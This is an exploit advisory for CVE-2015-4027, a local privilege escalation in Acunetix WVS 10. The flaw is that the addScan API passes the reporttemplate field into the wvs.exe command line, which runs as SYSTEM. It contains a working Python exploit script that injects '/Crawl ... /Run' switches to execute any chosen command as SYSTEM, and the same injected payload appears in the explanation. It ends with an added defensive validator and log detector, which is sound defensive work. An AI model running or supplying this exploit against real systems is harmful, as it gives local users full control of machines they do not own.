Acunetix WVS 10 - Local Privilege escalation
Source: danielelinguaglossa at gmail.com  Author: Daniele  Published: 2015-12-03
'''
========================================================================
Acunetix WVS 10 - from guest to System (Local privilege escalation)
 
CVE: CVE-2015-4027
Author: (me) Daniele Linguaglossa
Affected Product: Acunetix WVS 10
Exploit: Local privilege escalation
Vendor: Acunetix ltd
Remote: No
Version: 10
=========================================================================
A local privilege escalation exists in Acunetix WVS 10; it allows
a local user (even a guest) to gain the same privileges as the System user.
 
With a default Acunetix installation, a service called "AcuWVSSchedulerv10"
is installed; this service runs as the local System user.
 
AcuWVSSchedulerv10 is responsible for scan scheduling without user interaction;
it exposes some API endpoints, reachable via a web server, usually localhost:8183.
 
API:
 
/listScan
/addScan <== vulnerable one
/deleteScan
etc...
 
When a user schedules a scan, the API "addScan" is called as follows:
 
-------------------------------------------------------------------------------
POST /api/addScan HTTP/1.1
Host: localhost:8183
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
RequestValidated: true
X-Requested-With: XMLHttpRequest
Referer: http://localhost:8183/
Content-Length: 452
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
{
    "scanType": "scan",
    "targetList": "",
    "target": ["http://.target.it"],
    "recurse": "-1",
    "date": "12/2/2015",
    "dayOfWeek": "1",
    "dayOfMonth": "1",
    "time": "12:21",
    "deleteAfterCompletion": "False",
    "params": {
        "profile": "Default",
        "loginSeq": "<none>",
        "settings": "Default",
        "scanningmode": "heuristic",
        "excludedhours": "<none>",
        "savetodatabase": "True",
        "savelogs": "False",
        "generatereport": "False",
        "reportformat": "PDF",
        "reporttemplate": "WVSAffectedItemsReport.rep",
        "emailaddress": ""
    }
}
------------------------------------------------------------------------------
 
The first thing I noticed was the reporttemplate: this is used to create the report
when the scan ends, which means an external file that we can control will then be
used by System! This would have been interesting enough, but I never looked deeper into it.
Instead I noticed something even worse: the filename was used as an argument to wvs.exe,
which is called with System privileges!
 
By looking at how Acunetix handled the reporttemplate argument I figured out that it was
possible to inject custom arguments within reporttemplate. Now this is where
Acunetix helps us :D In fact wvs is provided with an interesting argument,
/Run, as the reference says:
 
https://www.acunetix.com/blog/docs/acunetix-wvs-cli-operation/
 
Run a command line command during the crawl.
Syntax: /Run [command]
 
Example: /Run curl http://example.com/dir1/
 
Wow, that's really nice: so in order to execute a command we must insert a fake
Crawl followed by a Run command, so reporttemplate becomes:
 
"reporttemplate": "WVSAffectedItemsReport.rep /Crawl http://fakesite.it /Run cmd.exe"
 
It worked: cmd ran as System!
==================================================================================
 
Now let's pwn this!
 
escalation.py
'''
 
import httplib
import json
from datetime import datetime
import sys
from time import gmtime, strftime
 
 
COMMAND = sys.argv[1] if len(sys.argv) > 1 else "cmd.exe"
ACUHOST = '127.0.0.1'
ACUPORT = 8183
ACUHEADERS = {
    "Content-Type": "application/json; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "RequestValidated": "true"
    }
ACUEXPLOIT = "/Crawl http://www.google.it /Run \""+ COMMAND + "\""
ACUDATA = {"scanType":"scan",
           "targetList":"",
           "target":["http://"+"A"*2048],
           "recurse":"-1",
           "date":strftime("%m/%d/%Y", gmtime()),
           "dayOfWeek":"1",
           "dayOfMonth":"1",
           "time": "%s:%s" % (datetime.now().hour, datetime.now().minute+1),
           "deleteAfterCompletion":"False",
           "params":{"profile":"Default",
                     "loginSeq":"<none>",
                     "settings":"Default",
                     "scanningmode":"heuristic",
                     "excludedhours":"<none>",
                     "savetodatabase":"True",
                     "savelogs":"False",
                     "generatereport":"False",
                     "reportformat":"PDF",
                     "reporttemplate":"WVSDeveloperReport.rep " + ACUEXPLOIT,
                     "emailaddress":""}
           }
 
def sendExploit():
    conn = httplib.HTTPConnection(ACUHOST, ACUPORT)
    conn.request("POST", "/api/addScan", json.dumps(ACUDATA), ACUHEADERS)
    resp = conn.getresponse()
    return "%s %s" % (resp.status, resp.reason)
 
print "Acunetix Wvs 10 Local priviledge escalation by Daniele Linguaglossa\n"
print "[+] Command : %s will be executed as SYSTEM" % COMMAND
print "[+] Sending exploit..."
print "[+] Result: "+sendExploit()
print "[+] Done!"
 
'''
============================================================================
 
I hope this write-up was funny enough; anyway, I really would like to thank
Acunetix product manager N.S. for the really fast answer and bug mitigation.
Right now a patch exists, so hurry up and download it now.
============================================================================
'''
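The root cause described above is that the reporttemplate value is concatenated into the wvs.exe command line, so whitespace-separated switches such as /Crawl and /Run are re-parsed as extra arguments. The following is an added example (not Acunetix's code and not part of the original advisory) showing how a defender would validate that field with an allow-list, pass scanner arguments as a list rather than a string, and flag injected switches in logged addScan bodies; the /ReportTemplate switch and the sample bodies are constructed for illustration.

```python
import json
import re

# Allow-list for the reporttemplate field: a bare template file name with no
# path separators, whitespace or switch characters. Assumed policy for this
# example, not Acunetix's own validation.
TEMPLATE_RE = re.compile(r"^[A-Za-z0-9_-]+\.rep$")
# Switch names that appear in the write-up; matched only as separate tokens.
SWITCH_RE = re.compile(r"(?i)(?:^|\s)/(?:run|crawl)\b")

# Constructed sample addScan bodies (one JSON document per line), not captures.
SAMPLE_BODIES = [
    '{"scanType":"scan","params":{"reporttemplate":"WVSAffectedItemsReport.rep"}}',
    '{"scanType":"scan","params":{"reporttemplate":'
    '"WVSDeveloperReport.rep /Crawl http://example.invalid /Run \\"cmd.exe\\""}}',
    'not json at all',
]


def validate_report_template(value):
    """True only when the value is a plain template name safe for a command line."""
    return bool(TEMPLATE_RE.match(value))


def build_wvs_argv(report_template, target):
    """Build the scanner's arguments as a list instead of a concatenated string,
    so a template value can never be re-parsed as extra switches. /ReportTemplate
    is a hypothetical switch name used only to illustrate the argv shape."""
    if not validate_report_template(report_template):
        raise ValueError("rejected reporttemplate: %r" % report_template)
    return ["wvs.exe", "/Crawl", target, "/ReportTemplate", report_template]


def find_injected_templates(log_lines):
    """Return reporttemplate values from logged addScan bodies that fail the
    allow-list and carry an injected /Run or /Crawl switch."""
    hits = []
    for line in log_lines:
        try:
            body = json.loads(line)
        except ValueError:
            continue
        tmpl = body.get("params", {}).get("reporttemplate", "")
        if not validate_report_template(tmpl) and SWITCH_RE.search(tmpl):
            hits.append(tmpl)
    return hits


if __name__ == "__main__":
    for tmpl in find_injected_templates(SAMPLE_BODIES):
        print("suspicious reporttemplate: %s" % tmpl)
```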
 